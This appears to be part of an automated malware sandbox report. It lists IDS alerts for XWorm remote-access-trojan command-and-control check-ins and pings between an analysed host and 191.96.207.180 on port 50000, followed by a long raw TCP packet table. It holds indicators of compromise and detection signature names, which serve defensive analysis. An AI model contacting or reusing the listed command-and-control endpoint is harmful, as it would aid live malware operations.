                                                      2024-09-24T19:26:53.969418+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:58.946650+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:58.948487+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:02.570295+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:02.572088+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:02.896185+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:02.896185+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:09.230985+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:09.273733+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:09.405766+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:09.407178+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:14.570796+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:14.590483+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:20.536912+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:20.575789+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:21.375677+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:21.377498+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:26.491944+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:26.496662+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:26.793587+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:26.795173+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:27.384312+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:27.393845+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:31.000920+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:31.002452+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:31.978866+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:31.980563+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:32.294184+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:32.295749+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:32.415590+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:32.508165+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:32.509450+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:32.601913+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:32.609303+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:32.889033+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:32.889033+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:37.695102+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:37.697128+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:47.914126+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:47.916305+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:48.008792+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:48.010326+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:48.103507+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:48.105240+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:53.460993+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:53.462880+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:27:53.555306+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:27:53.557408+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:28:02.917743+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:02.917743+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:04.504619+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:04.513037+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:28:09.220237+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:09.222074+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:28:20.190811+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:20.193394+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:28:26.117597+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:26.119013+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:28:26.961830+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:26.984322+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:28:32.943531+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:32.943531+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:33.102594+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:33.102594+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:33.726433+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:33.747633+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:28:40.508134+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:28:40.509105+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 24, 2024 19:24:43.609607935 CEST49705443192.168.2.8104.26.12.205
                                                      Sep 24, 2024 19:24:43.609711885 CEST44349705104.26.12.205192.168.2.8
                                                      Sep 24, 2024 19:24:43.609786034 CEST49705443192.168.2.8104.26.12.205
                                                      Sep 24, 2024 19:24:43.623399973 CEST49705443192.168.2.8104.26.12.205
                                                      Sep 24, 2024 19:24:43.623451948 CEST44349705104.26.12.205192.168.2.8
                                                      Sep 24, 2024 19:24:44.190236092 CEST44349705104.26.12.205192.168.2.8
                                                      Sep 24, 2024 19:24:44.190336943 CEST49705443192.168.2.8104.26.12.205
                                                      Sep 24, 2024 19:24:44.195307016 CEST49705443192.168.2.8104.26.12.205
                                                      Sep 24, 2024 19:24:44.195338011 CEST44349705104.26.12.205192.168.2.8
                                                      Sep 24, 2024 19:24:44.195709944 CEST44349705104.26.12.205192.168.2.8
                                                      Sep 24, 2024 19:24:44.206939936 CEST49705443192.168.2.8104.26.12.205
                                                      Sep 24, 2024 19:24:44.247416973 CEST44349705104.26.12.205192.168.2.8
                                                      Sep 24, 2024 19:24:44.342596054 CEST44349705104.26.12.205192.168.2.8
                                                      Sep 24, 2024 19:24:44.342669964 CEST44349705104.26.12.205192.168.2.8
                                                      Sep 24, 2024 19:24:44.342749119 CEST49705443192.168.2.8104.26.12.205
                                                      Sep 24, 2024 19:24:44.345844984 CEST49705443192.168.2.8104.26.12.205
                                                      Sep 24, 2024 19:24:44.470130920 CEST49706443192.168.2.8149.154.167.220
                                                      Sep 24, 2024 19:24:44.470185995 CEST44349706149.154.167.220192.168.2.8
                                                      Sep 24, 2024 19:24:44.470371008 CEST49706443192.168.2.8149.154.167.220
                                                      Sep 24, 2024 19:24:44.471358061 CEST49706443192.168.2.8149.154.167.220
                                                      Sep 24, 2024 19:24:44.471371889 CEST44349706149.154.167.220192.168.2.8
                                                      Sep 24, 2024 19:24:45.304044962 CEST44349706149.154.167.220192.168.2.8
                                                      Sep 24, 2024 19:24:45.304140091 CEST49706443192.168.2.8149.154.167.220
                                                      Sep 24, 2024 19:24:45.323116064 CEST49706443192.168.2.8149.154.167.220
                                                      Sep 24, 2024 19:24:45.323163033 CEST44349706149.154.167.220192.168.2.8
                                                      Sep 24, 2024 19:24:45.323452950 CEST44349706149.154.167.220192.168.2.8
                                                      Sep 24, 2024 19:24:45.324810028 CEST49706443192.168.2.8149.154.167.220
                                                      Sep 24, 2024 19:24:45.367408991 CEST44349706149.154.167.220192.168.2.8
                                                      Sep 24, 2024 19:24:45.367475033 CEST49706443192.168.2.8149.154.167.220
                                                      Sep 24, 2024 19:24:45.367489100 CEST44349706149.154.167.220192.168.2.8
                                                      Sep 24, 2024 19:24:45.691075087 CEST44349706149.154.167.220192.168.2.8
                                                      Sep 24, 2024 19:24:45.696333885 CEST44349706149.154.167.220192.168.2.8
                                                      Sep 24, 2024 19:24:45.696410894 CEST49706443192.168.2.8149.154.167.220
                                                      Sep 24, 2024 19:24:45.696697950 CEST49706443192.168.2.8149.154.167.220
                                                      Sep 24, 2024 19:25:01.518740892 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:01.524202108 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:01.524310112 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:02.520308018 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:02.525563955 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:02.525705099 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:02.668124914 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:02.672986031 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:13.616506100 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:13.621578932 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:13.791486979 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:13.832773924 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:13.918340921 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:13.923285961 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:24.573697090 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:24.578768015 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:24.748234987 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:24.749845028 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:24.754684925 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:32.877958059 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:32.926623106 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:35.520839930 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:35.525634050 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:35.698559046 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:35.700130939 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:35.705239058 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:46.473735094 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:46.478588104 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:46.648278952 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:46.650252104 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:46.656080961 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:57.427376032 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:57.432904959 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:57.608119965 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:25:57.610207081 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:25:57.614994049 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:02.903691053 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:02.957792044 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:08.380108118 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:08.384902000 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:08.555372000 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:08.556782961 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:08.562067032 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:12.757205963 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:12.762145996 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:12.931936026 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:12.934483051 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:12.939986944 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:15.848714113 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:15.853585958 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:16.023117065 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:16.024588108 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:16.029511929 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:16.051960945 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:16.057401896 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:16.340091944 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:16.341785908 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:16.346699953 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:16.367438078 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:16.372270107 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:16.652648926 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:16.656862020 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:16.662250996 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:17.208209038 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:17.213125944 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:17.382668972 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:17.384377956 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:17.389256001 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:21.551831961 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:21.557415009 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:21.614320993 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:21.619064093 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:21.645690918 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:21.650712013 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:21.725944996 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:21.728007078 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:21.732728958 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:21.820230961 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:21.821902990 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:21.826602936 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:21.914187908 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:21.915467978 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:21.920218945 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:25.333178043 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:25.338082075 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:25.507813931 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:25.514615059 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:25.519593954 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:27.020694971 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:27.025480986 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:27.195133924 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:27.196748018 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:27.201562881 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:32.647413015 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:32.678225994 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:33.059012890 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:33.063429117 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:33.104162931 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:33.123572111 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:33.123725891 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:33.135761976 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:37.676804066 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:37.682040930 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:37.851583958 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:37.853316069 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:37.858154058 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:42.754929066 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:42.763094902 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:42.946290016 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:42.951205969 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:42.960642099 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:48.051954031 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:48.056885958 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:48.176891088 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:48.198559999 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:48.233757019 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:48.235683918 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:48.283467054 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:48.381583929 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:48.387411118 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:48.406774998 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:53.567435026 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:53.603844881 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:53.661211014 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:53.681118011 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:53.708246946 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:53.713187933 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:53.774369001 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:53.780934095 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:53.785823107 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:53.873439074 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:53.875508070 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:53.880289078 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:53.967824936 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:53.969418049 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:53.974361897 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:58.770603895 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:58.776022911 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:58.946650028 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:26:58.948487043 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:26:58.954081059 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:02.395767927 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:02.400559902 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:02.570295095 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:02.572088003 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:02.576891899 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:02.896184921 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:02.941761017 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:08.943984032 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:09.070439100 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:09.230984926 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:09.231333017 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:09.236200094 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:09.273732901 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:09.278975964 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:09.405766010 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:09.407177925 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:09.412344933 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:14.396128893 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:14.401015997 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:14.570796013 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:14.590482950 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:14.595485926 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:20.165209055 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:20.365165949 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:20.536911964 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:20.575788975 CEST4970950000192.168.2.8191.96.207.180
